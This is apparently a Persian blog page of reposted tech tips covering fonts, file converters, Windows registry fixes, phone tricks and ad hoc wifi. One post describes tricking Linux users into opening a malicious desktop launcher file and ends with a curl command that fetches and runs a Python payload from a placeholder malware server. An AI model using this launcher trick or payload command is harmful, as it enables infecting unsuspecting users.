loading...
بهترین اس ام اس
بهنام علیپور بازدید : 153 یکشنبه 16 آبان 1389 نظرات (0)
در سراسر وب جهانی، به تعداد بسیار بالائی فونت برای دانلود وجود دارد و یکی از بزرگترین سرویسهای ارائه کننده فونهای زیبا deviantART میباشد که در اینجا ۴۰ تا از زیباترین فونتهای آن را خواهید یافت و میتوانید آنها را به طور رایگان دانلود نمائید. امیدوارم شما هم فونتهای مورد علاقه خود را در بخش کامنتها برای تکمیل این مطلب معرفی کنید.

۱- Bobel:

2- Tramyad.ttf:

3- Dreamforge Classic:

4- Eight One:

5-Cash Font:

6-Techno Funk font:

7-Tondo:

8-Special-K:

9-Quarters Typeface:

10-PUPPETEER:

11-Incinerator:

12-Sliced AB:

13-Aquanaut:

14-Simplistic Font:

15-Skirules-sans2.ttf:

16-Fracta font family:

17-Ugloosy.ttf:

18-House M.D:

19-PlagueDeath.ttf:

20-Homeboots:

21-Trashco.ttf:

22-Advent:

23-SMUDGERS:

24-MURDER OF MAYDAY:

25-CRANBERRY BLUES:

26-AvantGarde ALT:

27-Sorry Luthi V1.0:

28-TYPORM01R:

29-Oktober:

30-GUBBLEBUM:

31-Scene II -Machiavelli:

32-Gothique Cursive V.II:

33-Avee Black:

34-Ultravioleta:

35-Ogive Curvature:

36-Digital Ninja:

37-Squair:

38-Surrounding:

39-Armalite Rifle:

40-CFB:

41-Loserboi Grunge:



بهنام علیپور بازدید : 73 یکشنبه 16 آبان 1389 نظرات (0)


يكي از بهترين فورمت‌هايي كه براي ارسال فايل‌هاي انيميشني در وب از آن استفاده مي‌شود فورمت فلش با پسوند ‌.swf‌ است. اين قالب به‌دليل برخورداري از حجم بسيار كم و كيفيت فوق‌العاده عالي در به تصوير كشيدن تصاوير انيميشني، يكي از پر كاربردترين فورمت‌هاي مورد استفاده در طراحي صفحات وب و سي‌دي‌هاي مالتي‌مديا است. اگر شما هم انيميشن‌هاي بسيار زيادي را در اين قالب مشاهده مي‌كنيد و قصد داريد آنها را به فورمت‌هاي تصويري قابل پخش در دستگاه‌هاي ‌VCD‌ يا فايل‌هاي تصويري قابل پخش در رايانه‌ها تبديل كنيد، مي‌توانيد از نرم‌افزار ‌Amor SWF to Video Converter‌ كمك بگيريد.

اين نرم‌افزار که از پارس ويوا به شما معرفي مي کنيم، مي‌تواند انيميشن‌هاي فلش را به فورمت‌هايي همچون ‌.avi‌، ‌.vcd‌، ‌.svcd‌، .dvd‌‌ تبديل كند. امكان تبديل چندين فايل فلش به‌صورت همزمان، چسباندن چند فايل به يك فايل، استخراج صوت و تبديل انيميشن به تصاوير پشت سر هم برخي از ديگر قابليت‌هاي اين نرم‌افزار قدرتمند است. براي دريافت اين برنامه به سايت زير مراجعه كنيد:


http://www.zealot-soft.com

منبع: www.parsviva.com

بهنام علیپور بازدید : 81 یکشنبه 16 آبان 1389 نظرات (0)
مؤسسه فرهنگی و اطلاع رسانی تبیان وابسته به سازمان تبلیغات اسلامی به منظور گسترش فرهنگ و ارزشهای دینی و اسلامی در محیط مجازی، اقدام به ارسال حکمتهای حضرت علی(ع) از طریق پیامک کرده است.

این طرح همزمان با میلاد مبارک مولی الموحدین امیرالمؤمین علی (ع) توسط مؤسسه تبیان و به عنوان تأمین کننده محتوای غنی فرهنگی و اسلامی برای تمام مشترکان ایرانسل به مرحله بهره برداری رسید و اولین مرحله این سرویس نیز با نام حکمتهای گوهر بار(نهج البلاغه) اجرا شد .

در گام نخست همکاری مؤسسه تبیان و شرکت ایرانسل، تمامی مشترکان و کاربران ایرانسل می توانند با ارسال پیامک به شماره 8282 و درج کلمه Hekmat در پیام کوتاه خود، به صورت تصادفی یکی از حکمتهای پربار حضرت علی(ع) را به صورت متن دریافت کنند .

در مرحله بعدی، امکان دریافت متن و ترجمه قرآن نیز از سوی مؤسسه تبیان فراهم می شود.

بهنام علیپور بازدید : 109 یکشنبه 16 آبان 1389 نظرات (0)


بخش پرسش و پاسخ پارس ویوا محلی است برای مشاهده ی سوالاتی که مطمئناً برای هر یک از کاربران پیش می آید. در این بخش سعی شده است پاسخ پرسش ها با زبانی ساده ، کوتاه و مختصر باشد تا کاربران به راحتی و در زمان کوتاه به پاسخ خود دست یابند. توجه داشته باشید که این پرسش ها در حوزه فناوری اطلاعات می باشد و مختص بخش ویندوز رایانه، اینترنت، و... است.




پرسش: لطفا در مورد پسوند .‌ts‌ براي من توضيح دهيد و ضمنا نام نرم‌افزار تغيير اين پسوند را به ديگر پسوندها بگوييد.

پاسخ: جهت ارسال تصاوير ديجيتال از ساختاري به‌نام ‌TS‌ استفاده مي‌شود كه داراي جرياني است كه مي‌تواند دربرگيرنده چندين شبكه راديويي وتلويزيوني باشد. اين قالب نوعي فايل تصويري است كه در اصل يك فايل تصويري .‌avi‌ فشرده نشده است و معمولا دستگاه‌هاي گيرنده ماهواره براي ضبط تصاوير از اين قالب استفاده مي‌كنند. نرم‌افزارهاي زيادي براي تبديل فرمت‌هاي تصويري به يكديگر وجود دارد. از جمله مي‌توانيد با ‌Snapdrive‌ قالب اين فايل را بدون افت كيفيت به .‌mpeg‌ تبديل كنيد.






پرسش: من وقتي مي‌خواهم كليدهاي ‌Ctrl+Alt+Delete‌ را با هم فشار دهم با پيغام زير مواجه مي‌شوم:

.‌your administrator‌ Task manager has been disabled by‌

پاسخ: در صورتي كه كامپيوتر شما عضو يك دامنه باشد و شبكه به شما اجازه ندهد كه از ‌Task Manager‌ استفاده كنيد، امكان بروز چنين پيغامي هست. اما اگر ‌Computer‌ شما در شبكه‌اي نيست، بعضي از تنظيمات رجيستري كه ممكن است توسط ويروس تغيير كرده باشند، مانع دسترسي شما به ‌Task Manager‌ مي‌شود. پس ابتدا با يك آنتي‌ويروس قوي و به‌روز سيستم خود را جستجو كنيد. چنانچه ويروسي پيدا نشد، از منوي ‌Start‌، گزينه ‌Run‌ را انتخاب كنيد. در قسمت مربوطه ‌Regedit‌ تايپ كنيد و تاييد كنيد. به آدرس‌هاي رجيستري زير برويد و تغييرات زير را در رجيستري اعمال كنيد:

‌[HKEY_CURRENT_USERSoftwareMicrosoft‌

‌WindowsCurrentVersionPoliciesSystem]‌

‌00000000:"DisableTaskMgr"=dword‌

‌[HKEY_CURRENT_USERSoftwareMicrosoft‌

‌WindowsCurrentVersionGroup Policy ObjectsLocalUserSoftwareMicrosoft‌

‌WindowsCurrentVersionPoliciesSystem]‌

‌00000000:"DisableTaskMgr"=dword‌

‌[HKEY_LOCAL_MACHINESOFTWAREMicrosoft‌

‌WindowsCurrentVersionpoliciessystem]‌

‌00000000:"DisableTaskMgr"=dword‌

‌[HKEY_LOCAL_MACHINESOFTWAREMicrosoft‌

‌Windows NTCurrentVersionWinlogon]‌

‌00000000:"DisableCAD"=dword‌

سپس سيستم خود را دوباره راه‌اندازي كنيد.







پرسش: چطور مي‌شود لوگوي ويندوز ايكس‌پي در هنگام بوت شدن و هنگام خاموش شدن سيستم را عوض كرد و به‌جاي آن تصوير مورد نظر خود را گذاشت؟ آيا نرم‌افزاري در اين باره وجود دارد؟ ‌ ‌

پاسخ: براي اين كار بايد در فايل بوت ويندوز (كه در درايوي كه ويندوز در آن نصب است، وجود دارد) تغييراتي بدهيد. به اين ترتيب كه پس از آماده كردن تصوير موردنظر (با فرمت .bmp‌‌ و اندازه 480*640 پيكسل و 16‌رنگ)، آن را در مسير ويندوز با نام ‌boot.bmp‌ ذخيره كنيد. سپس فايل بوت ‌(boot.ini)‌ را با ‌Notepad‌ باز كرده و اين دو عبارت را ‌/bootlogo/ noguiboot‌ در پايان نام سيستم عامل خود اضافه كنيد.

مثال: ‌ ‌

‌ ‌‌[boot loader]‌

‌30timeout=‌

)0()disk0(default=multi

‌)WINDOWS1()partition0(rdisk‌

‌[operating systems]‌

‌)WINDOWS=2()partition0()rdisk0()disk0(multi‌

‌"Windo ws XP MCE"/fastdetect/bootlogo/noguiboot‌

البته در اين مورد نرم افزارهايي نيز وجود دارند كه اين كارها را انجام مي دهند و شما تنها بايد تصوير موردنظر خود را انتخاب كنيد. از جمله آنها مي توان به ‌StarDockBootSkin‌ و ‌BootXP‌ اشاره كرد.






پرسش: من وقتي در خانه از ‌Google‌ براي جستجو استفاده مي كنم، كلمات جستجوشده درحافظه آن مي‌ماند و وقتي اولين حرف كلمه جستجو شده را مي‌نويسم، كلمات زيادي در كشويي ظاهر مي‌شود. لطفا به من بگوييد آيا مي‌شود آنها را از بين برد؟

پاسخ: بله. براي پاك كردن چنين اطلاعاتي در اكسپلورر وارد منوي ‌Tools‌ شويد. گزينه ‌Internet options‌ را انتخاب كنيد و در لبه ‌General‌، قسمت ‌Browsing History‌، گزينه ‌Delete‌ را انتخاب كنيد. گذشته از گزينه ‌Delete All‌ شما مي‌توانيد گزينه ‌Delete Forms‌ روبه‌روي ‌Data Forms‌ را به‌تنهايي انتخاب كنيد تا تمام سابقه جستجوي شما حذف شود.
چنانچه نمي‌خواهيد امكان يادآوري جستجوهاي قبلي بر روي سيستم‌تان فعال باشد، به لبه ‌Content‌ برويد. در قسمت ‌Auto Complete‌ گزينه ‌Settings‌ را انتخاب كنيد. در آنجا تيك گزينه ‌Forms‌ را برداريد، تاييد كنيد و خارج شويد. از اين پس جستجوهاي شما ذخيره نمي‌شوند.




پرسش: به چند سوال پاسخ دهيد:
1– گزينه ‌Folder Option‌ حذف شده است.
2- ‌Task Manager‌ و ‌Registry‌ ويندوز من بسته شده است.
3– گزينه‌هاي ‌SMSS‌ و ‌NvCpl‌ در ‌Startup‌ خود‌به‌خود به‌وجود مي‌آيند.
4– برنامه ‌Autorun Eater‌ در كجاي ويندوز قرار دارد؟
5– قبلا آنتي ويروس‌هاي به‌روز و معتبري را نصب كرده‌ام، فايده نداشت حالا چند وقت است كه آنتي‌ويروس هم نصب نمي‌شود.
6– در ضمن ويندوز هم عوض كردم، بي‌فايده بود.

پاسخ: دوست عزيز، نشانه‌هايي كه گفتيد از علايم بارز انواع ويروس‌ها و تروجان‌هاست. برنامه ‌Autorun Eater‌، براي فعال‌سازي ‌Task Manager‌ و ‌Registry‌ قابل استفاده است كه با توجه به حجم بسيار كم آن، با همين نام، مي‌توانيد آن را به‌راحتي از اينترنت دانلود و اجرا كنيد. در صورت به‌روز بودن، آنتي‌ويروس‌هاي ‌32 Nod‌ و ‌McAfee‌ بيشتر اين ويروس‌ها را شناسايي و پاك مي‌كنند. چنانچه امكان دارد، هارد سيستم خود را فرمت كنيد و دوباره نسبت به نصب ويندوز اقدام كنيد.


منبع: www.parsviva.com

بهنام علیپور بازدید : 107 یکشنبه 16 آبان 1389 نظرات (0)
ممکن است شما نیز تا به حال تم های مختلف سونی اریکسون را نصب کرده باشید و دوست داشته باشید عکس های ثابت یا متحرک به کار رفته در این تم ها را جداگانه ذخیره کنید. در این ترفند راه حلی بسیار ساده برای استخراج عکس ها از تم های مخصوص سونی اریکسون به شما معرفی خواهیم کرد ، برای اینکار نیاز به هیچ نرم افزار جانبی نیز نخواهید داشت. 
برای این کار:
توسط My Computer به محلی که تم در آن موجود است بروید. (فایل نصب تمی که دانلود کرده اید یا بر روی CD دارید).
اکنون دقت کنید قابلیت نمایش پسوند فایلها فعال باشد. اگر این طور نیست در My Computer از منوی Tools به Folder Option بروید. (ترفندستان) در تب View تیک گزینه Hide extensions for file types را بردارید و OK کنید.
سپس فرمت فایل تم را (معمولأ thm.) را پاک کرده و (zip.) را جایگزین آن نمایید.
حال به سادگی با راست کلیک بر روی این فایل و انتخاب Extract Files میتوانید محتویات تم ساخته شده را از حالت فشرده خارج کنید.
در پوشه ایجاد شده ، تصاویر نیز موجودند.

بهنام علیپور بازدید : 61 یکشنبه 16 آبان 1389 نظرات (0)
همه ما در مورد ضدويروس بودن لينوكس چيزهاي زيادي شنيده‌ايم. همه‌مان هم مي‌دانيم كه امكان ندارد ويروسي بتواند بدون اجازه كاربر در لينوكس، دسترسي ريشه ‌(Root)‌ بگيرد. اين را هم مي‌دانيم كه بيت‌هاي اجرايي براي اجراي هر چيزي در لينوكس به‌كار مي‌روند، مگر فايل‌هايي كه از طريق وب دريافت مي‌شوند.



البته، شايان ذكر است كه توضيح دهيم ساختار سيستم عامل لينوكس بسيار مستحكم‌تر از ويندوز است و به‌سادگي كاربران نمي‌توانند با دريافت يك فايل آلوده، دچار مشكل شوند. اما، در این پست پارس ویوا خواهيم ديد كه چطور با پيمودن چند مرحله ساده، ‌مي‌توان براي لينوكس هم بدافزار نوشت. ‌ ‌


گفته شده است كه كدي كه در ادامه مي‌نويسيم، در دسته ويروس‌ها قرار نمي‌گيرد و بيشتر به‌عنوان تروجان‌ها مطرح مي‌شود. همچنين، بايد ذكر كنيم كه اين حفره‌هاي امنيتي از ويژگي‌هاي محيط‌هاي روميزي بيشتر لينوكس‌هاي محبوب، يعني گنوم و كي‌دي‌ئي به‌شمار مي‌رود. خود هسته اصلي لينوكس هيچ كدام از اين حفره‌ها را ندارد. لينوكس يا هر سيستم ديگري كه بر پايه يونيكس كار مي‌كند، اگر از گنوم يا كي‌دي‌ئي استفاده نكنند، قطعا هيچ مشكلي نخواهند داشت. همچنين گفته باشيم كه جدا بودن ميزكار از سيستم عامل، خود مزيت بزرگي به‌شمار مي‌رود و شما مي‌توانيد با تغيير ميز كار خود از اين مشكل نيز دوري كنيد. ‌ ‌

كاربران را وادار كنيد ايميل‌تان را بخوانند

اگر بدنبال راه جديدي براي نفوذ به كامپيوتر آسيب‌پذير مي‌گرديد، بايد نااميدتان كنيم. يكي از ابتدايي‌ترين ويروس‌ها، با اجراي كاربر فعال مي‌شود و ساختار ساده‌اي داشت. ما نيز از همين روش استفاده خواهيم كرد و آن را روي محيط كار مدرن لينوكس پياده خواهيم نمود. ‌ ‌

در ويندوز روال كار ساده است، شما يك ويروس مي‌نويسيد، آن را با پسوند ‌.exe‌ ذخيره مي‌كنيد و به ايميل‌تان پيوست مي‌كنيد. سپس با يك عنوان اغواكننده، كاربر را وادار به باز كردن آن مي‌كنيد و كاربر نگون‌بخت با باز كردن آن در سيستم عامل خودش - ويندوز - و در غياب حضور نرم‌افزار ضدويروس، به آن دچار خواهد شد. در يك چشم به‌هم‌زدن بدافزار خود را نصب مي‌كند و سيستم را تصاحب خواهد كرد. ‌ ‌

شما فكر مي‌كنيد چنين چيزي در لينوكس ممكن نيست؟ معلوم است كه چنين چيزي ممكن است. فقط نياز به يكي دو گام بيشتر دارد. هرچند، در معماري پايه‌لينوكس براي جلوگيري از حماقت كاربر و باز كردن فايل‌هاي آلوده، هيچ تدبيري انديشيده نشده است. بنابراين، ما مركز حملات خود را از اين ناحيه يعني ناداني كاربر آغاز خواهيم كرد. ‌ ‌

فقط يك يا دو مورد هست كه بايد به آنها دقت كرد.

نخست اين را بگوييم كه بيشتر نرم‌افزارهاي ايميل‌خوان لينوكس فايل‌هاي پيوست را اجرا نمي‌كنند. اين نرم‌افزارها فقط در صورتي فايل‌هاي پيوست را اجرا مي‌كنند كه بدانند محتواي آن چيست، يا پسوند آن را بشناسند (براي مثال فايل ‌PDF‌ يا ديگر پرونده‌ها....) فرض كنيم كه شما ويروس خود را با زبان زيباي پايتون نوشته باشيد و پسوند آن هم .py‌‌ باشد. در اين صورت يكي بايد تنظيمات سيستم را تغيير بدهد كه اين پسوند اجرا شود، چه كسي قرار است اين كار را بكند؟

پس نتيجه مي‌گيريم كه بايد از راه ديگري وارد شويم. چيزي كه هميشه موقع كليك كردن اجرا شود و به سراغ مرحله بعدي برويم. كاربر اول بايد پيوست را ذخيره كند و بعد روي آن دوبار كليك كند. از آن‌جايي كه نرم‌افزار ايميل‌خوان اين اجازه را نمي‌دهد، مجبوريم به ميزكار رجوع كنيم و خواهيم ديد كه چه‌ساده اجازه اين كار را خواهد داد. كافي است كه بار ديگر به ناداني كاربر اعتماد كنيم و مثلا جمله‌اي بنويسيم كه:

(اگر پيوست باز نمي‌شود، روي ميزكار خود ذخيره كنيد و بعد بازش كنيد...)

بيشتر ما اين پيغام را مشكوك قلمداد مي‌كنيم، اما همه‌ما نه. بنابراين، عده‌اي از ميان ما حتما آن را روي ميزكارشان ذخيره خواهند كرد. ‌ ‌

غفلت كاربران را دست كم نگيريد حتي در لينوكس

شما حتما مي‌خواهيد بگوييد كه كاربران لينوكس نسبت به كاربران ويندوزي از آن‌چه انجام مي‌دهند، هشيارترند. چرا كه انتخاب سيستم عامل ديگري جداي ويندوز و همچنين، يادگيري كار كردن با آن، دانشي فراتر از كاربران غيرفني را به‌آنها خواهد داد. اما اين موضوع در حال تغيير است، با انقلاب نت‌بوك‌ها كه به‌عنوان پيش‌فرض روي‌شان لينوك نصب است. بسياري از اين كاربران ديگر آگاهانه لينوكس را انتخاب نكرده‌اند و درست ميزان غفلت‌شان به اندازه كاربران ويندوزي خواهد بود. ‌ ‌

همچنين، دوران بي‌دغدغه لينوكسي در گذشته، اين حس غلط را به كاربران القا كرده است كه لينوكس همواره امن است. ما از همين ذكر كه «لينوكس بسيار امن است و نيازي به نرم‌افزار ضدويروس نداريد!» براي حمله استفاده خواهيم كرد و خيالمان راحت است كه وقتي آسيب زديم، نرم‌افزار ضدويروسي وجود ندارد كه بخواهد مچ ما را بگيرد.

بسيار خب، به مسايل فني بازگرديم، بيشتر نرم‌افزارهاي ايميل‌خوان،‌فايل‌هاي پيوست را روي ميزكار كاربر و در شاخه دانلود قرار مي‌دهند. بنابراين اگر كاربر فايل را بررسي نكند و آن را ذخيره كند، حقه‌مان را زده‌ايم. همان‌جايي كه ما مدنظرمان بود، فايلمان قرار مي‌گيرد. ‌ ‌

اجرا كردن فايل پيوستي

قبلا گفتيم كه فايل‌هاي پيوستي وقتي ذخيره مي‌شوند، به‌طور عادي اجرا نمي‌شوند. هيچ پسوندي در لينوكس وجود ندارد كه بگويد وقتي روي اين فايل كليك شد، ‌آن را اجرا كن و اين برخلاف ويندوز و پسوند ‌.exe‌‌اش است. بنابراين، مشكل دوم و بزرگي كه به آن مي‌خوريم اين است: براي اجراي يك فايل در لينوكس، حتما بايد كاربر در بخش دسترسي‌هاي فايل،‌آن را به فايل اجرايي تبديل كند. اين همان چيزي است كه ويندوز ندارد. و به‌خاطر همين است كه آلوده كردن سيستم‌هاي ويندوزي بسيار ساده‌تر است و تقريبا در سيستم‌هاي مبتني بر لينوكس غيرممكن به‌نظر مي‌رسد. وقتي يك فايل پيوستي را روي كامپيوتر خود ذخيره مي‌كنيد، پرچم اجرايي كردن فايل علامت نمي‌خورد و به‌همين ترتيب، وقتي روي فايل كليك مي‌شود، فايل اجرا نمي‌گردد. ‌ ‌

تند نرويم. محيط‌هاي ميزكار مدرني چون كي‌دي‌ئي يا گنوم، يك راه درروي زيبا به نام «سكوي پرتاب» يا ‌Launcher‌ به ما ارائه مي‌دهند.

سكوهاي پرتاب فايل‌هاي كوچكي هستند كه نشان مي‌دهند چه چيز بايستي اجرا شود. فقط چند خط كوتاه مي‌تواند اسم، آيكن و دستوري كه بايد اجرا شود را مشخص كند. خوشبختانه براي ما، گرامر دستور نوشتن در كي‌دي‌ئي و گنوم يكي است. همچنين جالب است بدانيد اين سكوهاي پرتاب نيازي به تنظيمات اجرايي ندارند! محيط‌هاي ميزكار اين فايل‌ها را به‌عنوان فايل استثنا قلمداد مي‌كنند. ‌

‌بنابراين وقتي روي فايل سكوي پرتاب گنوم يا كي‌دي‌ئي كليك مي‌كنيد، بدون آن‌كه نيازي به تنظيم كردن دسترسي خاصي باشيد، آن فايل اجرا مي‌شود. به‌نظرتان سخت است كه با يك دستور بخواهيم يك بدافزار را روي سيستم نصب كنيم؟ اين‌جا را ببينيد:

‌% bash -c "curl http://www.some_malware_
server.org/s.py -o /tmp/s.py; python /tmp/s.py"

 منبع: www.parsviva.com


بهنام علیپور بازدید : 117 یکشنبه 16 آبان 1389 نظرات (0)
ممکن است برای شما نیز پیش آمده باشد که صبح زود قصد بیدار شدن از خواب را داشته باشید و برای بیدار شدن بخواهید از ساعت گوشی تان استفاده کنید. اما اگر تعدادی دوست مردم آزار داشته باشید قضیه اندکی فرق میکند! چرا که در صورت روشن گذاشتن گوشی ممکن است به وسیله SMS یا تماس بی موقع دوستانتان از خواب بپرید. به همین خاطر شاید قید بیدار شدن به وسیله گوشی را بزنید! اما اصلأ نیازی به نگرانی نیست چون چاره این کار بسیار ساده است و با یک نیمچه ترفند قابل حل.

http://i38.tinypic.com/312k2ue.png

ساعت موجود در کلیه گوشی های نوکیا ، سونی اریکسون و سامسونگ و اکثر گوشی های همانند ، به نوعی متفاوت از سیستم عامل درونی گوشی عمل میکند.
شما کافی است ساعت خود را پیش از خواب تنظیم کنید و زنگ بیداری را انتخاب کنید ، سپس با خیال راحت گوشی را خاموش کنید و بخوابید. گوشی در همان حالت خاموش زنگ زده و شما را از خواب بیدار میکند.
جالب تر اینکه اگر نخواهید گوشی را خاموش کنید ، میتوانید گوشی را در حالت بی صدا Silent قرار دهید و لرزاننده آن را هم خاموش کنید ، (ترفندستان) سپس ساعت را تنظیم کنید و مطمئن باشید در زمان تعیین شده با صدای بلند زنگ خواهد زد.
جدا از این مسئله ، گاهی به وسیله این ترفند میتوانید شوخی هایی هم با دوستانتان بکنید. به فرض در سر کلاس درس ، بر روی گوشی دوستتان که در حالت Silent هم هست زنگ ساعت قرار دهید...!

بهنام علیپور بازدید : 118 یکشنبه 16 آبان 1389 نظرات (0)
امروزه استفاده از رايانه‌هاي قابل حمل (لپ‌تاپ) نيز همچون تلفن‌هاي همراه روز‌به‌روز در حال افزايش است و كاربران حرفه‌اي و حتي نيمه‌حرفه‌اي از اين وسيله سودمند استفاده مي‌كنند. يكي از مهم‌ترين مزيت‌هاي لپ‌تاپ‌ها برخورداري از امكانات اتصال بي‌سيم (كارت شبكه بي‌سيم) است و با فراگير شدن اينترنت با كمك اين نوع اتصال در مراكز عمومي همچون فرودگاه‌ها و بازارهاي كامپيوتري، كاربران به‌ساده‌ترين و سريع‌ترين شكل مي‌توانند از اين نوع اتصال استفاده كنند.

با اين وجود گاهي اوقات كاربران لپ‌تاپ‌ها نيازهاي خاصي پيدا مي‌كنند كه به‌ظاهر بسيار ساده است اما در عمل نمي‌توانند آن را برآورده كنند كه يكي از آنها شبكه كردن دو لپ‌تاپ با استفاده از اتصال بي‌سيم است!

همان‌طور كه مي‌دانيد براي شبكه كردن دو رايانه به يكديگر بهترين و ساده‌ترين روش استفاده از يك كابل شبكه از نوع ‌Cross‌ است كه با اتصال آن به هر دو رايانه آنها با يكديگر شبكه شده و مي‌توانند به اشتراك‌گذاري فايل و اينترنت بين يكديگر بپردازند. همچنين از ديگر روش‌هاي برقراري شبكه بين دو رايانه با كمك اتصال بي‌سيم بهره‌گيري از يك مسيرياب ‌(Router)‌ است كه در اين نوع اتصال نيز رايانه‌ها به مسيرياب متصل شده و اتصال آنها به يكديگر برقرار مي‌شود. حالا فرض كنيد دو لپ‌تاپ در اختيار داريد كه هر دو از اتصال بي‌سيم پشتيباني مي‌كنند اما مسيريابي در اختيار نداريد. به نظر شما شبكه كردن اين دو رايانه امكان‌پذير است؟

در پاسخ به سوال فوق بايد بگوييم بله! در مقاله اين اين پست پارس ويوا قصد داريم به شما روشي را آموزش دهيم كه با كمك آن به‌راحتي مي‌توانيد بيش از دو لپ‌تاپ را نيز بدون مسيرياب به يكديگر متصل نموده و به اشتراك‌گذاري فايل‌يا اينترنت در ميان آن‌ها بپردازيد.

توجه: با توجه به اين‌كه بيش از 90 درصد لپ‌تاپ‌هاي موجود در بازار به‌طور پيش‌فرض از ويندوز ويستا پشتيباني مي‌كنند اين آموزش نيز به اين سيستم‌عامل تعلق دارد اما نگران نباشيد، چرا كه براي به‌كارگيري اين روش تنها يكي از لپ‌تاپ‌ها بايد داراي ويندوز ويستا باشد و ويندوز ديگر لپ‌تاپ‌ها اهميتي براي ادامه كار ندارد.

گام اول: سرور مركزي

همان‌طور كه قبلا هم گفتيم براي برقراري ارتباط بي‌سيم بين دو يا چند رايانه بايد يك مسيرياب نيز در اختيار داشته باشيم پس در اولين مرحله براي ايجاد اين نوع ارتباط بدون در اختيار داشتن مسيرياب، تبديل يكي از رايانه‌ها به سرور مركزي است تا عملكردي همچون مسيرياب را شبيه‌سازي ‌كند.

براي انجام اين كار يكي از لپ‌تاپ‌ها كه داراي ويندوز ويستا است را انتخاب كرده و طبق ‌اين مراحل زير عمل مي‌كنيم:

1– ابتدا از نوار وظيفه‌(Taskbar) ‌ ويندوز و از ميان آيكون‌هاي كنار ساعت روي آيكوني كه به شكل دو كامپيوتر كوچك است كليك راست كرده و گزينه زير را انتخاب كنيد:

‌Network and Sharing Center‌

2– از گزينه‌هاي موجود در ستون سمت چپ روي عبارت زير كليك كنيد:

‌Set up a connection or network‌

3– در اين مرحله پنجره‌اي براي شما نمايش داده مي‌شود كه گزينه‌هايي را در اختيارتان قرار مي‌دهد. از اين پنجره گزينه زير را انتخاب كرده و روي كليد ‌Next‌ كليك كنيد:

Set up a wireless ad hoc‌

‌(computer-to-computer) network

4– در پنجره جديد توضيحاتي درباره اين نوع اتصال به شما نمايش داده مي‌شود و نكاتي ذكر مي‌شود كه از مهم‌ترين آنها شعاع تحت پوشش اين روش ارتباط است. در اين بخش ذكر شده است كه رايانه‌ها براي برقراري ارتباط مناسب نبايد خارج از شعاع 9 متري سرور مركزي باشند.

5– پس از پيمايش مراحل فوق، نوبت به اعمال تنظيمات امنيتي سرور مي‌رسد. در اين مرحله مي‌بايد نام شبكه، نوع امنيت و رمز اتصال به آن را مشخص كنيد. همچنين مي‌توانيد گزينه ‌Save this network‌ را نيز به‌حالت فعال درآوريد تا با راه‌اندازي مجدد رايانه و غيرفعال شدن سرور مركزي نياز نداشته باشيد تمام مراحل را براي راه‌اندازي آن مجددا طي كنيد.

6– چند لحظه صبر كنيد تا مراحل ايجاد سرور مركزي به پايان برسد. در صورتي كه همه چيز با موفقيت انجام شود با پيغامي مبني بر آماده بودن سرور براي استفاده رايانه‌ها مواجه خواهيد شد. همچنين اگر بخواهيد اينترنت فعال روي سرور مركزي را نيز بين رايانه‌هاي متصل به آن به اشتراك بگذاريد مي‌توانيد گزينه زير در اين پنجره را انتخاب كنيد:

‌Turn on Internet connection sharing‌

گام دوم: برقراري ارتباط

‌ ‌با طي كردن گام اول تمام كارهاي مورد نياز براي آماده‌سازي سرور مركزي به پايان مي‌رسد و براي اتصال ديگر رايانه‌ها به سرور نيز مي‌بايد طبق اين روش عمل كنيد:

فرق نمي‌كند رايانه‌ها از ويندوز ويستا استفاده مي‌كنند يا اكس‌پي، در هر دو مورد بايد وارد تنظيمات شبكه بي‌سيم شده و به جستجوي شبكه بپردازيد. پس از انجام عمليات جستجو مي‌بايد مسيريابي كه در مرحله 5 نام آن را مشخص كرديد، مشاهده كنيد، پس از انتخاب آن و كليك روي گزينه ‌Connect‌ و در نهايت وارد كردن رمز اتصال به مسيرياب، ارتباط شما برقرار مي‌شود و مي‌توانيد به‌راحتي به تبادل فايل با ديگر رايانه‌هاي متصل به شبكه بپردازيد. ‌ ‌

در پايان ذكر اين نكته ضروري است كه رايانه‌ها نبايد در فاصله‌بيش از شعاع 9 متر از سرور مركزي قرار بگيرند در غير اين‌صورت ارتباط آنها بسيار ضعيف يا غيرممكن خواهد بود.

منبع: www.parsviva.com



بهنام علیپور بازدید : 116 یکشنبه 16 آبان 1389 نظرات (0)

ارتباط تلفنی از طریق اینترنت با تمام نقاط جهان با Gizmo Project 3.1.1 276یك تلفن اینترنتی، به سادگی یك پیغام‌بر فوری. اكنون می‌توانید در كمال راحتی، از پشت میزتان تمام زنگ‌های خود را بزنید، آن‌هم با نشانه گرفتن، كلیك كردن، و البته، حرف زدن. در واقع دیگر لازم نیست برای تماس‌های تلفنی خود از طریق اینترنت، پولی پرداخت كنید.
این نرم‌افزار از اتصال اینترنتی شما (چه پرسرعت و چه تلفنی) استفاده كرده و امكان ارتباط تلفنی شما را با كامپیوترهای دیگر برقرار می‌سازد. برای یك بار هم كه شده است، خودتان یك تماس تلفنی اینترنتی با این نرم‌افزار بگیرید و سپس آن را به سایر دوستان و اقوام خود نیز توصیه كنید.این برنامه که تقریباّ شبیه به نرم افزارهای Skype و Google Talk میباشد، این امکان را به شما میدهد تا بتوانید یک ارتباط صوتی با کیفیت نسبتاً بالا با هر نقطه از جهان برقرار کنید و دیگر نگران هزینه های بالا مکالمه از طریق خطوط تلفن نباشید. - تماس رايگان به تمامي مصرف كنندگان نرم افزار - تماس رايگان تلفني و ارسال ايميل صوتي رايگان و كنفرانسهاي صوتي - ارسال تماس با بالاترين كيفيت - تماس با تلفن همراه و ...


دانلود با حجم 13.12 مگابایت

پسورد: www.soft-iran.com

منبع : http://www.soft-iran.com

بهنام علیپور بازدید : 83 یکشنبه 16 آبان 1389 نظرات (0)


آيا تابه‌حال به اين موضوع انديشيده‌ايد كه چطور مي‌توانيد در مقابل هرزنامه‌ها از فرم‌هاي وب خود محافظت كنيد؟

هيچ‌كس دوست ندارد، موقع ورود يا ثبت‌نام يا استفاده از فرم‌هاي وب، يك مشت حرف كج و معوج ببيند، و آنها را داخل فيلد مورد نظر وارد كند، اما آيا راه بهتري هم هست؟
بله، و بيشتر مردم از چنين راهي براي جلوگيري از حملات هرزنامه‌ها بي‌خبرند.
در بحث‌هايي كه براي جايگزيني ‌CAPTCHA‌ مي‌شود، نظريه‌اي است كه طبق آن، ‌مي‌توان با تشخيص رويدادهاي ماوس و يا فشرده شدن كليدها توسط جاوااسكريپت، از انسان بودن فرم‌پركننده مطلع شد.
در زير با كمك مثالي ساده، جانشيني براي ‌CAPTCHA ايجاد مي گردد. اما پيش از آن، بايستي نكات زير را در نظر بگيريد.
1 – فرم شما بايد برخي از رويدادهايي كه دليل فعاليت انساني‌اند، ثبت كند.

